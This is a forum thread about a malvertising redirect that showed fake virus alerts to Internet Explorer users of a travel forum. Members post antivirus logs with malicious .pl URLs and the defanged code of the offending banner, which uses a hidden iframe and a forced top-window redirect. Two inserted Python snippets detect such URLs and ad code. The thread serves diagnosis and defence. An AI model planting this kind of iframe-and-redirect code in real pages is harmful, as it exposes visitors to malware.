Originally Posted by chucko
(Post 19028396)
Same for me. And I'm not switching browsers for the sake of one buggy site.
Cheers. |
Originally Posted by chucko
(Post 19028396)
Same for me. And I'm not switching browsers for the sake of one buggy site.
|
Originally Posted by IBobi
(Post 19029323)
We are working to determine which advertisement is causing this messaging to occur. We still believe that this messaging is from an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.
This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, despite the message it shows you, you do not have a virus (from this) and FT is not infected. |
Originally Posted by IBobi
(Post 19029323)
We are working to determine which advertisement is causing this messaging to occur.
http://i71.photobucket.com/albums/i1...an/suspect.jpg |
Originally Posted by RLG
(Post 19029806)
You've been posting this same update almost verbatim for a week. We already know we don't have a virus unless we click on the link. What we don't know is why it's taking so long for you to make progress on this. It isn't as if it's a rare and difficult to duplicate problem.
Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve. Paul |
Originally Posted by IBobi
(Post 19029491)
Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.
The browser is NOT the cause. FT is. |
Originally Posted by LGANightOwl
(Post 19030001)
Asking people to switch browsers is NOT a solution
Paul |
IBobi, I just got a screenshot of the image, but how do I either post it online or send it to you via PM? I saved it to a jpeg file and have it on desktop.
The image shows "Introducing the NEW Citi/Aadvantage Card" and "FlyertalkForums." It appeared when I first opened IE, at which point I got a screenshot--Start/Programs/ABBYY Screenshot Reader. At the top of the screen, the url starts, http://cleaninspectionreliability.pl [etc.]. After I got the screen, I closed the laptop, then reopened it and again opened IE, this time no problems (so far). |
Okay, while surfing around FT and upon clicking to check on the Support sub-forum's page, the following pop-up displayed on my Dell laptop (running Windows 7 Ultimate, SP1 with latest security patches & update, aVast! Antivirus and ZoneAlarm - under Internet Explorer V9 (256-bit)
*** Caution/Warning/Notes: - I inserted extra spaces in between to avoid anyone accidentally clicking on it & getting "trapped" - especially on less secured PC vulnerable to these junks !! ***
http : //cleaninspectionreliability . pl/f169m/al/78dee9e271084cb2/196/
I was able to move away from this pop-up page, without doing a forced shutdown via the Task Manager, etc.
Switching to Firefox to check the page, I'm getting an alert about Citi AmericanAirlines AAdvantage advertisement link as being an untrusted connection - (graphics-based or embedded links/websites were linked on CC as being the likely source and origin of the infection)
creditcards.citicards.com uses an invalid security certificate. The certificate is not trusted because no issuer chain was provided. (Error code: sec_error_unknown_issuer)
If you understand what's going on, you can tell Firefox to start trusting this site's identification. Even if you trust the site, this error could mean that someone is tampering with your connection. Don't add an exception unless you know there's a good reason why this site doesn't use trusted identification. |
This (virus warning) happens on one of my computers when browsing FT pretty regularly. On my other computer it doesn't seem to happen. Regardless, as I can reproduce at a high frequency, I will be willing to assist in finding the problem. If I need to do anything specific (like turning debug mode or capture wireshark trace) then let me know.
|
Originally Posted by IBobi
(Post 19029923)
If you look above, some members are either requesting an update, or have not read the updates we've posted and are stating that no admins are responding. This serves both purposes.
Originally Posted by IBobi
(Post 19029923)
Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.
A lot of people are having this problem and maybe they can help you reproduce it. |
Crap. Now I'm getting it too on IE on my laptop. Switched to iPhone but come on guys, you're all exposing us here and if/when someone gets infected you're going to get sued. All for the sake of not killing your ads/revenue while you troubleshoot.
Do what we did in my previous help desk days. Kill all ads, then bring them back one by one. When people scream, you have a winner. |
I'm not an IT person, so apologies if this is of no use at all to the investigation. This is my history from AVG showing the report of each time it stopped IE when I opened Flyertalk.
As you can see - it's an exploit rogue scanner, type 1929. Whatever that means.
"Exploit Rogue Scanner (type 1929)";"reliabilityprotectlow.pl/fq2f8o/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"30/07/2012, 22:58:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
"Exploit Rogue Scanner (type 1929)";"protecttoolsmicrosoft.pl/n7065jpi/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"29/07/2012, 22:06:10";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
"Exploit Rogue Scanner (type 1929)";"testpreventionremedy.pl/wd9ih3904/ss/78dee9e271084cb2/pr2/196/";"Object was blocked";"19/07/2012, 12:46:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe" |
The latest redirect site: http://urlquery.net/report.php?id=108921
The redirects appear to be always to *.pl domain with the same Turkish IP address (31.210.109.37). Every day a new *.pl domain is being used because the existing ones are being closed down - http://support.clean-mx.de/clean-mx/...t=first%20desc
Other forums (http://www.quartertothree.com/game-t....php?p=3182083) on the net have also reported redirect problems to an identical IP address.
Again, I think it is highly unlikely this redirect is coming from an advertisement. It is more likely to be an exploit in a script (java/php) run on this site. |
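Added example, not written by any poster in this thread: the AVG history and the redirect URL quoted in the posts above change host name and first path segment every time, but some path segments repeat. This sketch parses the posted AVG rows and derives those stable segments so a proxy or DNS log can be searched for sightings on hosts nobody has reported yet. Function names and the test host are made up here, and the tokens only describe what was posted on this page.

```python
import csv
import io

# Rows copied from the AVG history posted in this thread (semicolon-separated).
AVG_EXPORT = r'''"Exploit Rogue Scanner (type 1929)";"reliabilityprotectlow.pl/fq2f8o/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"30/07/2012, 22:58:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
"Exploit Rogue Scanner (type 1929)";"protecttoolsmicrosoft.pl/n7065jpi/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"29/07/2012, 22:06:10";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
"Exploit Rogue Scanner (type 1929)";"testpreventionremedy.pl/wd9ih3904/ss/78dee9e271084cb2/pr2/196/";"Object was blocked";"19/07/2012, 12:46:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
'''
# Redirect URL another member reported earlier in the thread (no "pr2" segment).
EXTRA_URLS = ["cleaninspectionreliability.pl/f169m/al/78dee9e271084cb2/196/"]


def blocked_urls(export_text):
    """Return (date, url) pairs from an AVG history export."""
    rows = csv.reader(io.StringIO(export_text), delimiter=";", quotechar='"')
    return [(r[3].split(",")[0], r[1]) for r in rows if len(r) >= 4]


def split_url(url):
    """Split a scheme-less URL into (host, [path segments])."""
    host, _, path = url.partition("/")
    return host.lower(), [s for s in path.split("/") if s]


def signature(urls):
    """Keep what every sighting shares: the TLD and the path segments that never change."""
    parsed = [split_url(u) for u in urls]
    tlds = {host.rsplit(".", 1)[-1] for host, _ in parsed}
    first = parsed[0][1]
    tokens = [s for s in first if all(s in segs for _, segs in parsed[1:])]
    return {"tlds": tlds, "tokens": tokens}


def matches(url, sig):
    """True if the URL has a known TLD and carries the stable tokens in order."""
    host, segs = split_url(url)
    if host.rsplit(".", 1)[-1] not in sig["tlds"]:
        return False
    it = iter(segs)
    return all(tok in it for tok in sig["tokens"])  # ordered subsequence test


if __name__ == "__main__":
    sightings = blocked_urls(AVG_EXPORT)
    sig = signature([u for _, u in sightings] + EXTRA_URLS)
    print(sig)
    # Constructed, never-seen host: still caught because the path tokens repeat.
    print(matches("constructed-new-name.pl/zz91k/al/78dee9e271084cb2/196/", sig))
    print(matches("www.flyertalk.com/forum/", sig))
```

Matching on the repeated path segments keeps working when the host is replaced, which a per-domain blocklist does not.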
Originally Posted by IBobi
(Post 19029323)
[snip], despite the message it shows you, you do not have a virus (from this) and FT is not infected. [snip]
Originally Posted by IBobi
(Post 19029923)
[snip] Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.
Paul
(1) Since your more recent post indicates that you haven't seen the false virus alert yet, and since I gather that not all IE users have seen it, it would be interesting to see if maybe there might be a common denominator?
(2) After you have found and corrected the problem, could you please again issue us an assurance as to the malware question? Appreciate the earlier reassurance, and hope you are right, but since you haven't encountered the problem yourselves, is it possible yet to be certain that this thing is not installing something? (I understand that from the IT standpoint it might be possible to be certain that it isn't. I am definitely not IT-savvy, hence my question.) |
This shouldn't take a week to fix.
Hell, it shouldn't take a day. |
Originally Posted by IBobi
(Post 19029491)
Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.
|
Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").
Thank you! Paul |
Since I pay to not see ads,
it seems I am missing out on all the fun. Therefore, when it comes time to renew... no more money for IB from me. :td: |
Originally Posted by IBobi
(Post 19035574)
Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").
|
Originally Posted by IBobi
(Post 19035574)
Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").
Thank you! Paul
Happens when you manually input the address in the address bar, via google.com, favourites or history. Can't post the source code when it happens because the redirection is happening before the page loads. Avast is picking it up as URL:Mal - HTTP/1.1 301 but doesn't list the offending problem. I have installed a logger to pick up where the redirecting is originating from. |
Paging Sergeant Schultz, paging Sergeant Schultz...
|
Originally Posted by IBobi
(Post 19035574)
Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").
Thank you! Paul
I tried to right-click on "view source," per your post above, but couldn't. Right-clicking, any clicking, nothing, worked. One more thing changed, however, in addition to the all-white screen background. I was able to shut the screen down with Ctrl Alt Del and in the past even that procedure has not worked.
I think that the posters who say that this screen hits once a day are onto something. I think it usually--but not always--has appeared once/day. Not a hundred percent, however.
There was what might be another possible oddity following my turning the laptop off and turning it back on. After I turned it back on, this time, and opened IE and FT again, FT went blank for a split second, then came back on. So I am wondering if the appearance of the "false virus" screen does do something to the browser or computer, at least for the day? |
Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?
Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning. Thank you, Paul |
Originally Posted by IBobi
(Post 19036253)
Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?
Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.
I went to http://www.flyertalk.com/forum/usercp.php to try logging in to test your question. I got the login page and immediately got hit with the "virus warning." This time, though, my own (real) MSE detected that a virus had been installed (just from going to the page!). http://www.microsoft.com/security/po...tid=2147638814
So, I couldn't actually login before getting infected. This is nasty stuff. I'm not inclined to want to try to test more in case whatever the next re-direct/hijack is manages to actually damage my computer with something that my AV program misses. |
Originally Posted by IBobi
(Post 19036253)
Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?
Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning. Thank you, Paul
And the alert always appears very very soon from typing in the Flyertalk URL so I doubt people had a chance to log on before they were molested with this warning. I usually type ww.flyert and then suggestions appear and I click straight onto BA executive club and the warning appears every time I have not accessed the site for a while without fail. Maybe you could ask people to fill in a small questionnaire to gather similar characteristics and to be able to replicate the problem. |
IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/ also does it on IE 8 on laptop - same shortcut |
Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occurring?
Anyone seeing something similar timewise? bj-21. |
Originally Posted by blackjack-21
(Post 19037094)
Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occurring?
Anyone seeing something similar timewise? bj-21. |
As noted by others, I generally get only one per 24 hour period.
|
Originally Posted by holmedown
(Post 19036466)
IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/ also does it on IE 8 on laptop - same shortcut |
After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!
|
Originally Posted by Jay2261
(Post 19038629)
After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!
|
It is only happening for me when I am logged in - if I am logged out/cookies cleared, it doesn't seem to happen.
|
Can we have a little more feedback as to why this hasn't been repaired yet? I even sent screen shots and didn't even receive an acknowledgement.
With all due respect, 11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency. |
A new screen appeared today, when I used Chrome. Significance: I think some IE material might have been residual when I went to Chrome.
Sequence of events:
(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:
Plug-in Unresponsive [yellow caution icon with exclamation mark]
The following plug-in is unresponsive: Unknown
Would you like to stop it? [boxes to check] Yes No
I can send a snip of the new screen but would need instructions on how to PM a jpg file. |
Urgent @ Admin
I have found the source of the redirect (all links have been deliberately broken by me in the http bit to inadvertently stop any users clicking on them):
It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972).
This is a copy of the request header:
(Request-Line):GET /banner.php?campaign_id=12175&rc=475737972919972 HTTP/1.1
Accept:application/javascript, */*;q=0.8
Referer:http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive
This appears to be a bogus site. The above banner page contains the following malicious code:
document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');
document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
<html> <body> <script> window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/"; </script> </body> </html> |
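Added example, not part of the post above and not FlyerTalk's own tooling: a static check an ad-operations team could run over creative responses before trafficking them, flagging the two traits visible in the quoted banner, a 1x1 iframe pointing at a host other than the one serving the ad, and script that navigates the top window. The function and constant names are made up here, and treating the second snippet as the iframe's response is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Banner response quoted in the post above, still defanged (hxxp) as posted.
BANNER_JS = (
    """document.write('<a href="hxxp://hoteldetect.net" target="_blank">"""
    """<img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');"""
    """document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" """
    """frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');"""
)
# Second snippet from the same post; assumed here to be what the 1x1 iframe returns.
IFRAME_BODY = ('<html> <body> <script> window.top.location.href='
               '"hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/"; '
               '</script> </body> </html>')

# Script that assigns or calls top/parent.location, i.e. navigates the embedding page.
TOP_NAV_RE = re.compile(
    r"\b(?:top|parent)\.location(?:(?:\.href)?\s*=(?!=)|\.(?:replace|assign)\s*\()")
TINY = {"0", "1", "0px", "1px"}


class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def audit_creative(body, serving_host):
    """Return (finding, host) pairs for one ad response served from serving_host."""
    findings = []
    finder = IframeFinder()
    # Undo JS string escaping so markup inside document.write('...') parses as HTML.
    finder.feed(body.replace('\\"', '"').replace("\\'", "'"))
    finder.close()
    for attrs in finder.iframes:
        host = urlsplit(attrs.get("src") or "").hostname or ""
        if attrs.get("width") in TINY and attrs.get("height") in TINY and host != serving_host:
            findings.append(("hidden-third-party-iframe", host))
    if TOP_NAV_RE.search(body):
        findings.append(("top-frame-navigation", serving_host))
    return findings


if __name__ == "__main__":
    print(audit_creative(BANNER_JS, "adliclick.com"))
    print(audit_creative(IFRAME_BODY, "adbitserver.com"))
```

On the publisher side, serving third-party ad tags inside an iframe whose `sandbox` attribute omits `allow-top-navigation` stops script in the ad from changing the top window's location.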
Good job MoneyBagger. (Work that should have been done by IB/Flyertalk over a week ago.)
|
Nice work MoneyBagger.
|
Originally Posted by MoneyBagger
(Post 19039734)
Urgent @ Admin
I have found the source of the redirect (all links have been deliberately broken by me in the http bit to inadvertently stop any users clicking on them):
Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised? |